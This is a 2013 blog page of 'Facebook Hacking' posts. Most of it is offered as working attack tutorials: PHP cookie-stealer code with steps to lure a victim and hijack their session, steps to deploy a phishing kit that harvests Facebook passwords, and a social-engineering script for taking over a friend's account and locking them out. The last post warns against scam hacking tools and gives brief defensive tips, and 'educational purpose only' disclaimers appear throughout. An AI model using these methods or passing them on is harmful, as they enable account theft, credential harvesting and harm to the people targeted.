Showing posts with label Facebook Hacking. Show all posts
Showing posts with label Facebook Hacking. Show all posts

Tuesday, January 29, 2013

What is Cookie Logger Or Cookie Stealer?

Hi Guys... This is DJ Alone... as Per I Promised That i Will Post Cookie Logger / Cookie Stealer Tutorial...Here is This Tutorial For You...

First Of All Let Me Say Clearly... I'm Not Encourging U TO Do This...

Note :- This Tutorial is For Education Purpose Only... & Its For Better Security For Ur Self...

Now Let's Move To The Topic...


What is Cookie Logger / Cookie Stealer ???


A Cookie Logger Or Cookie Stealer is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim...

So, Today I Will Help U Guys in Making Ur Own Cookie Logger...So , Enjoy...

Step 1 :- Download The Script From Below Link and Rename it To Alone.GIF  (what ever u wanna save)...

http://www.mediafire.com/?s13y1lrpx8hc6h0

Step 2 :- Then Copy The Following Script Into NotePad & Save It As CookieLogger.PHP  (whatever u wanna save)...


$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3 :- Create a New Text File & Save it As logfile.txt

Step 4 :- Now Upload The Following Files To Ur Hosting Site... Like 000WebHost Or MY3GB...


cookielogger.php :- http://www.t3chnohacker.blogspot.com/cookielogger.php

logfile.txt :- http://www.www.t3chnohacker.blogspot.com/logfile.txt (chmod 777)

Alone.gif :- http://www.t3chnohacker.blogspot.com/alone.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://my3gb.com
http://000webhost.com

* Rename T3chno Hacker To Ur Website...

Step 5 :- Now Ur Cookie Logger / Cookie Stealer  is Ready To Be Used... Now All U Had To Do is Find The Victim & Try Cookie Logger / Cookie Stealer On Them...

Note :- Give Ur Victim The Link Of GIF File...

Step 6 :- If Ur Victim Clicks On Ur Link U Will Get His / Her Cookies...and That Cookies Will Stored In Ur Website's logfile.txt... So, The Cookie Will Looks Like Below...


u_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; 
u_sid=3bd7bdcb4e9e41737ed6eb41c43a4ec9



Step 7 :- Now All U Need To Do Is... Remove Ur Cookies Or Replace The Above Cookies With Ur Own Cookies... And Boom... Congrats U Will Succesfully Logged In To Ur Victim's Account...

Note :- Use Mozilla FireFox For This... And Use Cookie Editor ADD-ON in FireFox For Editing Cookies in Mozilla...

Step 8 :- 
For getting the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie...You can use a Cookie Editor for this...
The string before “=” is the name of the cookie and the string after “=” is its value...
So Change the values of the cookies in the cookie Editor...



Note :- Make Sure that ur Victim should be Online because u are Hijacking ur Victim’s Session...
So if the Victim clicks on Logout you will also Logout automatically...
but once you have changed the password then you can again login with the new password... but the victim would not be able to login with it...

MUST READ :- I don’t take any responsibility for what you do with this script...Its Only for Educational purpose only…


How To Get Secure From Cookie Loggers / Cookie Stealer ???

Don't Click On Any Links Given By Anyone...
Use Secure Connection Security In Facebook...
Use Login Notifications For Better Security...

Don't Click On SPAM Links Videos Or Pics...

Never Ever Try RATS or KeyLoggers...

Be Safe...Don't Use Any Softwares For Hacking...Coz All Are Fakes...

Hacking is Not Playing With SomeOne's Account... 

Real Hacking is Much More Than It...


All The Hackers are Not Same... We are Humans & We Had Heart Also...

So, Wake Up Fast... With The New Techys...

DJ Alone...





Posted By आर्यावर्त11:04 PM

Saturday, January 19, 2013

Hack Facebook Accounts By Phishing

Hi Guys... This is DJ Alone...
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT Administrators are commonly used to lure the unsuspecting. Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require tremendous skill to detect that the website is fake.

Read more for the Phishing Tutorial

Now i am going to explain you “How to do phishing”...

Just Follow the steps as indicated below and if you face any problems you are free to post your problems in comments section.

Step 1: The First Step in Making the site is to register an account at 000webhost (if you have account than you can skip first 2 steps)
Step 2Now Go to your email account that you gave and confirm your account with confirmation link 

Step 3: Now Download this Facebook Phisher (Mediafire Link)

Step 4: Now Go to 000webhost and Log into your account...
Step 5Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it...

Step 6: Now Click on the Public_html...


Step 7: Now click on the Upload button, choose the files that you have downloaded, to be uploaded...

Step 8: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected...

NOTE :- To See The Usernames and Password GO to public_html there u will see a text file...open that to see the usernames and password...
Note :- For Educational Purpose Only...







Posted By आर्यावर्त3:55 AM

Facebook Hacking (Social Engineering)


Hi... Guys... This is DJ Alone...

This is a must read  post on Facebook Hacking... With this technique you can Hack ID's of your best friends...

Requirements :-
  1. A cellphone that can receive texts
  2. A Slave (Must Be in Your friend list)
  3. Patience...

Step 1 : Pick a Target and start a conversation with him/her...

Conversation :- 

You: Hey can u help me really fast?!?
slave: Sure what do u need?
You: I told a friend of mine that i don't have a phone and hes askingwhose phone number this is: (Your number here), I told him its urs but he does not believe me…
So can you umm put this as your phone number for like 5 mins??
slave: Ok how?
You: Just go to account settings and on the left it says mobile click on that and put this number in: ( Your number here) and company is: ( Reliance, Airtel etc whatever phone company you use)
slave: K its asking for a confirmation code…
You: (You should get a confirmation code) Ok heres the code: (your code here)
slave: Kk done

Step 2 : Logout or use a different browser and open Facebook , then click on Forgot Password.

Now enter his/her details and click on Search. Then you will get a option of recovering ur Facebook ID with ur email id or Mobile. Click on Mobile. Then click send code, your phone should receive a code , enter that code. Thats it you are DONE!!!

To make sure they dont get their account back i suggest changing the email and deleting any other email registered on the account...

Posted By आर्यावर्त3:05 AM

Thursday, January 17, 2013

The Reality Of Hacking Facebook,Gmail,Yahoo Accounts

This is a must read post for the beginners and newbies who have just started exploring hacking and for laymen who aren't interested in learning hacking but needs somebody's account password anyhow. I want you to aware about common misconceptions regarding Email/Social Networking Sites accounts hacking...
Otherwise those thoughts/misconceptions can seriously put you in trouble.
We usually start like googling this, "how to hack gmail" , "
softwares for hacking orkut","how to hack facebook" etc
 but unfortunately reach some malicious websites,
 follow stupid instructions and our own accounts get compromised.


Yes I wasn't any different and had been a foolish when I was a beginner


Okay talking in general ,
 suppose you just have signed up for an account(gmail,yahoo or any other reputed website)
Your password is stored only at two places


1. In website's database
2. In your mind
(Dont say a stupid thing that it is also saved in a text file on your
PC or in your girlfriend's mind etc)


Fetching your credentials (Id/password) from website's database is almost impossible.
They are paynig million of dollars for securing their systems.
Here I should remind you that, I am talking only about the reputed companies like microsoft,google,facebook etc.
 Hard Core hackers might get success in compromising their systems.


Now talking about your mind, its might be really very simple to do this. Shocked ?
At this ponit,
 I must say that hacking an email account depends strongly on carelessness/foolishness of victim.


FAQs or misconceptions regarding the same:-


Does any free/paid software/program/cracker exist to hack such accounts ?

No .You might get numberless free or preminum softwares which claim to crack email accounts.
The softwares just ask you to enter victim's email and start cracking/generating password.
I have already told you about two places where one's password is. From where the hell ,these softwares would bring passwords for you ? .

This kind of stuff is undoubtedly scam/rubbish....

Is there any free/premium online service to hack such accounts ?

No.You might have logged on to many websites that claim to crack any
email account for some amount of money.
They are completely fraud and be aware of them. Dont lose your money there ...

An Other type of fraudYou might have come across many tutorials/videos that instruct you
to compose an email to something@something.com.
You are asked to write victim's email ID, your
email ID, your password and are assured that you would get requested password within 24 hours.
Needless to say, it is an idea of befooling innocent people .
Ofcourse,your own account gets compromised...
Beleive me , you cant imagine the number of people who become victim of such rubbish things
 They
lose their money,time,accounts but get nothing in return. So take care.

How to hack these accounts ?

Every method directly/indirectly involve victim's carelessness/lack of knowledge.


Non-Technical-
While signing up for an account, we are asked to set a security question like our nickname,
birthday place etc so that we could recover our account in case we forget our password.
Many innocent people sets the correct asnwer which they are not supposed to do.
 Gather some information about victim and try to guess the answer of security question.


Technical-


1. Phishing- The most common way of hacking them is phishing. 
The common type of phishing is Fake Login Page.
The victim is anyhow anyway made to enter his credentials in fake login page which resembles the genuine login page and gets hacked. 
2.Malicious files- The victim is given a malicious file.
It could be binded with or hidden behind a genuine file.
 It is usually a keylogger or trojan.
A keylogger secretly records everything you type and sends to attacker.
Obviously records your passwords too. 
3.Stealing Sessions- Talking in simple language, whenever we sign into an account it generates a unique piece of string.
One copy is saved on server and other in our browser as cookie.
Both are matched everytime we do anything in our account.
This piece of string or login session is destroyed when we click on 'Sign Out' option.
An attacker can steal that session by convincing victim to run a piece of code in browser.
 Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim clicks 'Sign out' ,
session gets destroyed and attacker too also gets signed out.


Note-You might be thinking that one could sniff the credentials sitting in same network. 
 But I should remind you that, 
they would be encrypted ones and cracking the SSL encryption is almost impossible.


Conclusion-


Sign up for an account at gmail/yahoo/facebook/orkut/hotmail....
Now forget its password and recovery options
Never login into it ... 

Can anyhow the password be cracked/hacked.?? 
Answer is big NO... 




Posted By आर्यावर्त11:49 PM